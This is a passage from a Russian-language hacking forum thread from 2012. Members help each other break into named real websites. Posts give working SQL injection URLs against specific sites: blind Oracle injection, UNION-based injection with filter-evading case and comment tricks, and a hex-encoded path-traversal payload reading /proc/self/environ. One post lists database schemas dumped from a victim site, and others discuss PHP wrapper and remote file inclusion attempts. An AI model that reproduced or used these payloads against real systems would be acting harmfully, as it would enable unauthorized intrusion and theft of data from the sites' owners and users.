Старый 27.03.2012, 18:03   #1861
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

а пробовал чтение файлов, выполнение кода через враперы? Там же RFI
Pashkela вне форума   Ответить с цитированием
Старый 27.03.2012, 18:09   #1862
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Дописывает расширение, нуль байт экранирует , нормализация пути не прокатила. Походу, финиш.
Pashkela, для некоторых врапперов говорит "failed to open stream: no suitable wrapper could be found", для некоторых что урл задан неверно. В общем, не катят. Читать файлы через них тоже не получится из-за добавляющегося расширения.
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 27.03.2012, 18:16   #1863
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
а пробовал чтение файлов, выполнение кода через враперы? Там же RFI
URL file-access is disabled in the server configuration.
M@ZAX@KEP,
вообще никак? Я тоже так подумал и сюда запостил.
Ereeee вне форума   Ответить с цитированием
Старый 27.03.2012, 18:27   #1864
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
URL file-access is disabled in the server configuration.
Это если в лоб через http:// валить. Если через php:// и иже с ними, там несколько иная реакция.
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 28.03.2012, 11:11   #1865
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Опять нужна поомщь с раскруткой:
http://www.tvk[stopgoogle]ultura.ru/forum.html?FID=81&FThrID=132749870227+and+1=1
Ereeee вне форума   Ответить с цитированием
Старый 28.03.2012, 12:52   #1866
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

Цитата:
Сообщение от Ereeee Посмотреть сообщение
Опять нужна поомщь с раскруткой:
http://www.tvk[stopgoogle]ultura.ru/forum.html?FID=81&FThrID=132749870227+and+1=1
Там Oracle.
И судя по всему Blind:
http://www.tvk[stopgoogle]ultura.ru/forum.html?FID=81&FThrID=132749870227)+and+rownum= rownum+and+(123=123

Вот сдампил БД немного:
Код:
ADM
APOLOGIA
BABIES
BAYARD
BIBIGON
BIBIGON2
BIGGER
CARS2
CONTENT
CULTTV
EDINROS
GONKA
KOT
MAYAKBSS
MDB
NUTCRACKER
PLANETA
PROBEG
PUB
RTRTV
RUTV2
RUTV3
SHANHAI
SNGSUMMIT
SPORT
SYMBOL
SYMBOL2
SYMBOL3
SYS
SYSTEM
TECHLIB
TOAD
UKSOCCER
UKSOCCER2012
VERA
VESTI7
VGTRK
VIDEOHOSTING
WOYAGER
YUNOST40
EDINROS - хе-хе
Tigger вне форума   Ответить с цитированием
Старый 28.03.2012, 14:08   #1867
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Помогите докрутить
Код:
http://www.klad[dot]com.ua/products.php?id=27'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/das/_domains/klad.com.ua/products.php on line 8
2 колонки
Код:
http://www.klad[dot]com.ua/products.php?id=27+order+by+2--+
Код:
http://www.klad[dot]com.ua/products.php?id=27+UNION+ALL+SELECT+1,2--+
Forbidden
You don't have permission to access /products.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Узнал только, что тут 5ая ветка
Код:
http://www.klad[dot]com.ua/products.php?id=27+and+substring(Version(),1,1)like(5)--+
cat1vo вне форума   Ответить с цитированием
Старый 28.03.2012, 14:13   #1868
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

cat1vo

http://www.klad.com.ua/products.php?id=-27+UnIon(selECt(1),2,3,4,5,6,7,8,9,10,11,version() )--+

Там еще и LFI, третья колонка.

http://www.klad.com.ua/products.php?id=-27+UnIon(selECt(1),2,0x2E2E2F2E2E2F2E2E2F2E2E2F2E2 E2F2E2E2F2E2E2F2E2E2F70726F632F73656C662F656E76697 26F6E,4,5,6,7,8,9,10,11,version())--+
Tigger вне форума   Ответить с цитированием
Старый 28.03.2012, 16:04   #1869
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Цитата:
Сообщение от Tigger Посмотреть сообщение
Там Oracle.
И судя по всему Blind.
Вот сдампил БД немного.
EDINROS - хе-хе
Не подскажешь софт, с помощью чего ты сдампил. Пробывал некоторые, не устроили...
Ereeee вне форума   Ответить с цитированием
Старый 28.03.2012, 16:07   #1870
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Вот похожая ситуация, не получается вытащить данные из information_schema.tables, похоже доступ закрыт.
Код:
http://precomp[dot]ru/newsread.php?id=-27+/*!union*/+/*!all*/+/*!select*/+1,version(),3,4,5,6,7,8--+
Пробовал перебрать таблицы через JOIN, но попытки не увенчались успехом... Может есть другой способ вытащить название таблиц без доступа к information_schema?
Код:
http://precomp[dot]ru/newsread.php?id=-27+/*!UNION*/+/*!SELECT*/+*+/*!FROM*/(/*!SELECT*/+*+/*!FROM*/+/*!users*/+/*!JOIN*/+/*!users*/+b)a
cat1vo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot